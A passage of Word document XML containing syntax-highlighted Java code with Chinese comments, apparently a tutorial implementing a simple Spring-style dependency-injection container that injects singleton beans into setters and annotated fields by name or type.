          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>属性获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Bean</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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> {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injectBean = sigletons.get(properdesc.getName());</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (injectBean == </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>没有指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>根据属性名称进行寻找</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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (String key : sigletons.keySet())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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>根据属性类型进行寻找</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (properdesc.getPropertyType().isAssignableFrom(sigletons.get(key).getClass())) {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injectBean = sigletons.get(key);</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break</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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lastRenderedPageBreak/>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>setter.setAccessible(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">);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setter.invoke(bean, injectBean);</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>把引用对象注入到属性</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>查找字段上是否有注解</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 xml:space="preserve">Field[] fields = bean.getClass().getDeclaredFields(); </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>取得声明的所有字段</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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Field field : fields)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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (field.isAnnotationPresent(MyResource.class)) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>判断字段上是否存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>MyResource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>注解</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MyResource resource = field.getAnnotation(MyResource.class);</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 xml:space="preserve">Object value = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (resource.name() != </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; !</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">.equals(resource.name())) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>判断是否指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>属性</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value = sigletons.get(resource.name());</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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">value = sigletons.get(field.getName()); </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>没有指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>那么根据字段名称寻找</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (value == </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (String key : sigletons.keySet())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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>根据字段类型进行寻找</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (field.getType().isAssignableFrom(sigletons.get(key).getClass())) {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value = sigletons.get(key);</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break</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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field.setAccessible(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>允许访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>字段</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field.set(bean, value);</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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Exception e)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e.printStackTrace();</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   * </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>对象的属性注入值</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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private</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> injectObject()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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (BeanDefinition beanDefinition : beanDefines)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Object bean = sigletons.get(beanDefinition.getId());</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bean != </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
